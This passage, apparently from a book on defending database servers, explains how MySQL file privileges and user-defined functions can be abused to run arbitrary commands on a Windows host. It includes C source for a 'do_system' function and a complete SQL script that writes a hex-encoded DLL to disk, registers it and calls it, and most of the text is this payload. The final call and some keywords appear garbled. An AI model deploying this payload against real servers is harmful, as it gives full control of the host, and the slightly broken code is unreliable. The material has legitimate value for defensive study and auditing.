User-Defined Functions in Windows
In Windows, placing the library file in an executable location is significantly easier because most versions of Windows will load DLLs from the current working directory of the process. This was another factor that contributed to the ability of the W32/Sdbot.worm.gen.j worm to gain control of Windows hosts .
If you create a file like this:
mysql> select 0x010203 into dumpfile '123.dll';
a file will be created containing the 3 bytes 0x010203 called 123.dll, in the MySQL data directory, which is the current working directory of MySQL.
All you need now is a suitable Windows UDF DLL. The source code for your simple "system" UDF is as follows :
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <io.h> enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT}; typedef struct st_udf_args { unsigned int arg_count; /* Number of arguments */ enum Item_result *arg_type; /* Pointer to item_results */ char **args; /* Pointer to argument */ unsigned long *lengths; /* Length of string arguments */ char *maybe_null; /* Set to 1 for maybe_null args */ } UDF_ARGS; typedef struct st_udf_init { char maybe_null; /* 1 if function can return NULL */ unsigned int decimals; /* for real functions */ unsigned long max_length; /* For string functions */ char *ptr; /* free pointer for function data */ char const_item; /* 0 if result is independent of arguments */ } UDF_INIT; extern "C" declspec(dllexport) char *do_system(UDF_INIT *initid, UDF_ARGS *args, char *result, unsigned long *length, char *is_null, char *error) { int bufsiz = 1024 * 8, retlen; char *buff = (char *)malloc( bufsiz ); if( args->arg_count != 1 ) return 0; system( args->args[0] ); strcpy( buff, "Success" ); retlen = (int)strlen( buff ) + 1; *length = retlen; initid->ptr = buff; return buff; } extern "C" declspec(dllexport) void do_system_deinit(UDF_INIT *initid) { if( initid->ptr ) free( initid->ptr ); } If you compile this DLL to be as small as possible (in tests, it was possible using the DLL version of the runtime library and the /Opt:NoWin98 flag to create UDF DLLs as small as 4KB), you then have all of the pieces you need to run arbitrary code on a Windows system, given root access to the MySQL server.
A script of the following form will create a file named test_udf.dll in the current working directory of MySQL, create a UDF function entry, and call the system function to place a directory listing in the file foo.txt in the MySQL data directory:
select 0x4D5A90000300000004000000FFFF0000B8000000000000004000000000000 00000000000000000000000000000000000000000000000000000000000F00000000E1FB A0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F7420626520727 56E20696E20444F53206D6F64652E0D0D0A24000000000000004350529007313CC307313 CC307313CC3843961C305313CC307313DC30D313CC3023D61C304313CC3023D33C306313 CC3023D63C300313CC3023D5CC305313CC3023D60C306313CC3023D66C306313CC352696 36807313CC3000000000000000000000000000000000000000000000000504500004C010 400085AF2410000000000000000E0000E210B01070A00040000000800000000000034110 000001000000020000000000010001000000002000004000000000000000400000000000 000005000000004000000000000020000000000100000100000000010000010000000000 000100000006022000064000000442100003C00000000000000000000000000000000000 0000000000000000000004000007C000000302000001C000000000000000000000000000 000000000000000000000000000882000004800000000000000000000000020000030000 0000000000000000000000000000000000000000000000000002E746578740000005C030 000001000000004000000040000000000000000000000000000200000602E72646174610 000C4020000002000000004000000080000000000000000000000000000400000402E646 17461000000280000000030000000020000000C000000000000000000000000000040000 0C02E72656C6F630000920000000040000000020000000E0000000000000000000000000 000400000420000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000566800200000FF15142000108BF08 B4424108B0883C40483F901740433C05EC38B40088B0851FF15282000108B154C2000108 916A1502000108946048BC683C4048D50018A084084C975F98B4C24142BC28B542408408 90189720C8BC65EC3CC8B4424048B400C85C0740A89442404FF2508200010C38B4424088 5C0750E3905143000107E2EFF0D1430001083F8018B0D102000108B09890D18300010754 F6880000000FF151420001085C059A320300010750433C0EB79832000A120300010A31C3 00010E88C010000689A120010E870010000C70424043000106800300010E833010000FF0 51430001059EB3F85C0753CA12030001085C07433EB138B0D1C3000108B0985C97407FFD 1A120300010832D1C3000100439051C30001073DE50FF150820001083252030001000593 3C040C20C006A0C6858200010E8C401000033C0408945E433FF897DFC8B750C3BF7750C3 93D143000100F84AC0000003BF0740583FE027531A1243000103BC7740CFF751056FF750 8FFD08945E4397DE40F8485000000FF751056FF7508E8E5FEFFFF8945E43BC774728B5D1 05356FF7508E83F0100008945E483FE01750E3BC7750A5357FF7508E8BBFEFFFF3BF7740 583FE0375295356FF7508E8A8FEFFFF85C07503897DE4397DE47413A1243000103BC7740 A5356FF7508FFD08945E4834DFCFF8B45E4EB1A8B45EC8B088B095051E8DA0000005959C 38B65E8834DFCFF33C0E82A010000C20C00FF250C200010833D20300010FF7506FF25202 00010681C3000106820300010FF74240CE81601000083C40CC3FF742404E8D1FFFFFFF7D 81BC0F7D85948C36A0C6868200010E8A2000000C745E438210010817DE43821001073228 365FC008B45E48B0085C0740BFFD0EB0733C040C38B65E8834DFCFF8345E404EBD5E8A60 00000C36A0C6878200010E85E000000C745E440210010817DE44021001073228365FC008 B45E48B0085C0740BFFD0EB0733C040C38B65E8834DFCFF8345E404EBD5E862000000C3F F2524200010837C2408017513833D2430001000750AFF742404FF150020001033C040C20 C00685013001064A100000000508B442410896C24108D6C24102BE05356578B45F88965E 8508B45FCC745FCFFFFFFFF8945F88D45F064A300000000C38B4DF064890D00000000595 F5E5BC951C3FF2518200010FF251C2000100000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 0003222000000000000C4210000D8210000E4210000BA210000062200001A22000028220 000F4210000B02100000000000000000000085AF241000000000200000053000000D0200 000D0080000537563636573730000000000FFFFFFFFF61100100712001000000000FFFFF FFF831200108712001000000000FFFFFFFFC7120010CB120010000000004800000000000 000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000010300010302100100100000052534453CE2B1 54C7C561145A1FD80E9B17CE4840C000000683A5C706572736F6E616C5C626F6F6B735C4 46268685C6D7973716C5C746573745F7564665C52656C656173655C746573745F7564662 E70646200000000000000000000000000005013000000000000000000000000000000000 000882100000000000000000000CC210000082000008021000000000000000000004E220 0000020000000000000000000000000000000000000000000003222000000000000C4210 000D8210000E4210000BA210000062200001A22000028220000F4210000B021000000000 0001B0373797374656D0000DF026D616C6C6F630000AC026672656500004D53564352373 12E646C6C003F015F696E69747465726D00BB005F61646A7573745F6664697600004C005 F5F4370705863707446696C74657200F1005F6578636570745F68616E646C65723300006 B005F5F646C6C6F6E6578697400B8015F6F6E6578697400840044697361626C655468726 561644C69627261727943616C6C73004B45524E454C33322E646C6C00000000000000000 000085AF241000000009C220000010000000200000002000000882200009022000098220 0000010000060100000A9220000B322000000000100746573745F7564662E646C6C00646 F5F73797374656D00646F5F73797374656D5F6465696E697400000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000004EE64 0BB000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000001000006400000008302 8302E30353071308030883091309930A630AE30BC30C130CB30D730DC30E730F330FF300 C311231193122312831373154316831DB311A32203229322E323332593265326C329D32A 932B032E032ED32FA32053352335833000000200000180000005C3060306C3070307C308 030C430C8300000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000 into dumpfile 'test_udf.dll'; create function do_system returns string soname 'test_udf.dll'; select('dir > foo.txt'); This technique works in Windows versions of MySQL up to and including version 4.1.9, and is likely to work for quite some time. Because MySQL runs as the LocalSystem account, it is straightforward to then fully compromise the Windows host. To recap, the privileges you needed to do this are file_priv, and the ability to create a function.
The Database Hackers Handbook: Defending Database Servers
ISBN: 0764578014
EAN: 2147483647
EAN: 2147483647
Year: 2003
Pages: 156
Pages: 156